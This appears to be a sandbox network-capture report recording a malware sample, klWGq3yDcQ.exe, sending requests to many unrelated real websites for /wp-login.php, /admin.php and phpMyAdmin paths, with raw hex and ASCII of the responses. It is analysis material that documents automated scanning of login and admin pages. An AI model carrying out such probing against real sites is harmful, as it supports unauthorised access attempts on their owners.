                                                                                                                                                                                                    2023-11-26 05:59:39 UTC9214INData Raw: 32 33 46 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6e 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 42 65 61 63 68 20 52 65 63 72 75 69 74 6d 65 6e 74 20 42 2e 56 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 63 72 69 70 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 4a 61 76 61 73 63 72 69 70 74 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 74 79 6c 65 2d 54 79 70 65 22 20
                                                                                                                                                                                                    Data Ascii: 23F6<!DOCTYPE html><html lang="nl"><head><title>Beach Recruitment B.V.</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/Javascript"><meta http-equiv="Content-Style-Type"
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC5381INData Raw: 31 34 46 44 0d 0a 63 61 74 65 67 6f 72 69 65 2f 39 34 36 37 38 2f 63 61 74 2f 61 6c 6c 22 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 3c 53 54 52 49 4b 45 3e 42 65 6b 69 6a 6b 20 61 6c 6c 65 20 76 61 63 61 74 75 72 65 73 3c 2f 53 54 52 49 4b 45 3e 3c 2f 41 3e 3c 2f 50 3e 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 21 2d 2d 4c 49 4e 4b 53 2d 2d 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 49 74 65 6d 43 6f 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 46 6f 74 6f 22 3e 0a 09 09 09 09 09 3c 69 6d 67 20 73 74 79 6c 65 3d 22 22 20 61 6c 74 3d 22 22 20 74 69 74 6c 65 3d 22 22 20 77 69 64 74 68 3d 22 31 39 32 30
                                                                                                                                                                                                    Data Ascii: 14FDcategorie/94678/cat/all" target="_self"><STRIKE>Bekijk alle vacatures</STRIKE></A></P></div></div></div>...LINKS--></div><div class="tItemCon"><div class="tFoto"><img style="" alt="" title="" width="1920
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC12232INData Raw: 32 46 43 30 0d 0a 2d 2d 3e 3c 2f 73 70 61 6e 3e 56 65 72 74 72 6f 75 77 65 6c 69 6a 6b 0a 09 09 3c 2f 64 69 76 3e 0a 09 09 0a 09 09 0a 09 09 0a 09 09 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 73 6c 43 6c 65 61 6e 65 72 20 6a 73 6c 4b 77 43 6c 65 61 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 09 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 6f 6f 6b 49 74 65 6d 57 6f 72 64 20 6a 73 6c 4b 65 79 77 6f 72 64 20 6a 73 6c 43 68 61 70 6f 22 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 09 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 73 6c 43 6c 65 61 6e 65 72 20 6a 73 6c 4b 77 43 6c 65 61 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 09 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 6f 6f 6b 49 74 65 6d 43 6f 6e 74 61 69 6e 65 72 20 6a 73 6c 49
                                                                                                                                                                                                    Data Ascii: 2FC0--></span>Vertrouwelijk</div><div class="jslCleaner jslKwCleaner"></div><div class="hookItemWord jslKeyword jslChapo"></div><div class="jslCleaner jslKwCleaner"></div></div><div class="hookItemContainer jslI
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    238192.168.2.461651162.250.126.54436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC180OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: mydirectlender.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC527INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 25 32 30 43 6f 6f 6b 69 65 25 32 30 63 68 65 63 6b 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 0d 0a 78 2d 66 72 61 6d 65 2d 6f 70 74 69 6f 6e 73
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8set-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; securex-frame-options
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC841INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 53 74 61 67 69 6e 67 20 66 6f 72 20 4d 79 44 69 72 65 63 74 4c 65 6e 64 65 72 2e 63 6f 6d 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Staging for MyDirectLender.com &#8212; WordPress</title><meta name='robots' content='noindex, nofollow' /><scrip
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC5794INData Raw: 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 66 6f 72 6d 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 66 6f 72 6d 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 31 30 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 31 30 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f
                                                                                                                                                                                                    Data Ascii: nk rel='stylesheet' id='forms-css' href='https://mydirectlender.com/wp-admin/css/forms.min.css?ver=6.4.1' type='text/css' media='all' /><link rel='stylesheet' id='l10n-css' href='https://mydirectlender.com/wp-admin/css/l10n.min.css?ver=6.4.1' type='text/


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    239192.168.2.461770104.26.12.2454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC177OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: hightideinc.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC774INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 76 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:39 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC595INData Raw: 31 38 65 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 48 69 67 68 20 54 69 64 65 20 49 6e 63 2e 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 72 63 68 69 76 65
                                                                                                                                                                                                    Data Ascii: 18e9<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; High Tide Inc. &#8212; WordPress</title><meta name="robots" content="max-image-preview:large, noindex, noarchive
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC1369INData Raw: 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 66 6f 72 6d 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 6c 31 30 6e 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 31 30 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d
                                                                                                                                                                                                    Data Ascii: "https://hightideinc.com/wp-admin/css/forms.min.css?ver=6.4.1" type="text/css" media="all" /><link rel="stylesheet" id="l10n-css" href="https://hightideinc.com/wp-admin/css/l10n.min.css?ver=6.4.1" type="text/css" media="all" /><link rel="stylesheet" id=
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC1369INData Raw: 41 64 64 72 65 73 73 3c 2f 6c 61 62 65 6c 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 6c 6f 67 22 20 69 64 3d 22 75 73 65 72 5f 6c 6f 67 69 6e 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 22 20 76 61 6c 75 65 20 73 69 7a 65 3d 22 32 30 22 20 61 75 74 6f 63 61 70 69 74 61 6c 69 7a 65 3d 22 6f 66 66 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 75 73 65 72 6e 61 6d 65 22 20 72 65 71 75 69 72 65 64 3d 22 72 65 71 75 69 72 65 64 22 20 2f 3e 0a 3c 2f 70 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 73 65 72 2d 70 61 73 73 2d 77 72 61 70 22 3e 0a 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 75 73 65 72 5f 70 61 73 73 22 3e 50 61 73 73 77 6f 72 64 3c 2f 6c 61 62 65 6c 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 70 77 64 22 3e 0a
                                                                                                                                                                                                    Data Ascii: Address</label><input type="text" name="log" id="user_login" class="input" value size="20" autocapitalize="off" autocomplete="username" required="required" /></p><div class="user-pass-wrap"><label for="user_pass">Password</label><div class="wp-pwd">
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC1369INData Raw: 28 29 3b 20 64 2e 73 65 6c 65 63 74 28 29 3b 7d 20 63 61 74 63 68 28 20 65 72 20 29 20 7b 7d 7d 2c 20 32 30 30 29 3b 7d 0a 77 70 5f 61 74 74 65 6d 70 74 5f 66 6f 63 75 73 28 29 3b 0a 69 66 20 28 20 74 79 70 65 6f 66 20 77 70 4f 6e 6c 6f 61 64 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 20 29 20 7b 20 77 70 4f 6e 6c 6f 61 64 28 29 20 7d 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 70 20 69 64 3d 22 62 61 63 6b 74 6f 62 6c 6f 67 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 22 3e 26 6c 61 72 72 3b 20 47 6f 20 74 6f 20 48 69 67 68 20 54 69 64 65 20 49 6e 63 2e 3c 2f 61 3e 20 3c 2f 70 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 69 76 61 63 79 2d 70 6f 6c 69 63 79 2d 70 61
                                                                                                                                                                                                    Data Ascii: (); d.select();} catch( er ) {}}, 200);}wp_attempt_focus();if ( typeof wpOnload === 'function' ) { wpOnload() }/* ... */</script><p id="backtoblog"><a href="https://hightideinc.com/">&larr; Go to High Tide Inc.</a> </p><div class="privacy-policy-pa
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC1369INData Raw: 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 76 65 6e 64 6f 72 2f 77 70 2d 70 6f 6c 79 66 69 6c 6c 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 33 2e 31 35 2e 30 22 20 69 64 3d 22 77 70 2d 70 6f 6c 79 66 69 6c 6c 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 68 6f 6f 6b 73 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 63 36 61 65 63 39 61 38 64 34 65 35 61 35 64 35 34 33 61 31 22 20 69 64 3d 22 77 70 2d 68 6f 6f 6b 73 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70
                                                                                                                                                                                                    Data Ascii: ightideinc.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0" id="wp-polyfill-js"></script><script type="text/javascript" src="https://hightideinc.com/wp-includes/js/dist/hooks.min.js?ver=c6aec9a8d4e5a5d543a1" id="wp-hooks-js"></script><scrip
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC314INData Raw: 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 64 3d 22 75 73 65 72 2d 70 72 6f 66 69 6c 65 2d 6a 73 2d 65 78 74 72 61 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 75 73 65 72 50 72 6f 66 69 6c 65 4c 31 30 6e 20 3d 20 7b 22 75 73 65 72 5f 69 64 22 3a 22 30 22 2c 22 6e 6f 6e 63 65 22 3a 22 30 30 37 63 61 39 30 65 65 30 22 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 6a 73 2f 75 73 65 72 2d 70 72 6f 66 69 6c 65 2e 6d 69 6e 2e 6a 73 3f 76
                                                                                                                                                                                                    Data Ascii: cript><script type="text/javascript" id="user-profile-js-extra">/* <![CDATA[ */var userProfileL10n = {"user_id":"0","nonce":"007ca90ee0"};/* ... */</script><script type="text/javascript" src="https://hightideinc.com/wp-admin/js/user-profile.min.js?v
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    240192.168.2.461744104.200.30.314436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC174OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                    Host: edgewater.group
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC164INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:39 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC196INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    241192.168.2.461604185.135.132.1054436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC174OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: grantstech.io
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC341INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 32 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 61 6e 74 73 74 65 63 68 2e 69 6f 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:39 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 323Connection: closeLocation: http://www.grantstech.io/phpmyadmin/Cache-Control: max-age=0Expires: Sun, 26 Nov 2023 0
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC323INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 61 6e 74 73 74 65 63 68 2e 69 6f 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.grantstech.io/phpmyadmin/">here</a>.</p><hr><address>Apache/2.4.5


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    242192.168.2.46161335.164.64.2464436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC174OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: belongfbg.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC150INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 39 20 47 4d 54 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 74 72 61 6e 73 66 65 72 2d 65 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not Founddate: Sun, 26 Nov 2023 05:59:39 GMTcontent-type: text/html; charset=UTF-8transfer-encoding: chunkedconnection: close
